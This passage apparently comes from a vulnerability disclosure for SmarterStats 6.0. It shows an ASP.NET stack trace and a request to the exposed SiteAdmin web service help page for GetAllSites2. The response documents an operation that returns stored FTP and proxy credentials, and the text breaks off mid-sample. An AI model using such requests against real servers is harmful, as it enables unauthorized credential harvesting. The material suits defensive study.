[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetAllSites2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=''; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 28998
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetAllSites2</h2>
<p class="intro">Returns all sites listed in the MRS with multiple log locations.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetAllSites2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IncludeDetails:</td>
<td><input class="frmInput" type="text" size="50" name="IncludeDetails"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetAllSites2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSites2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSites2Result&gt;
&lt;/GetAllSites2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSites2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSites2Result&gt;
&lt;/GetAllSites2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetAllSites2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteSettingInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/SiteSettingInfoArrayResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetAllSites2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteSettingInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
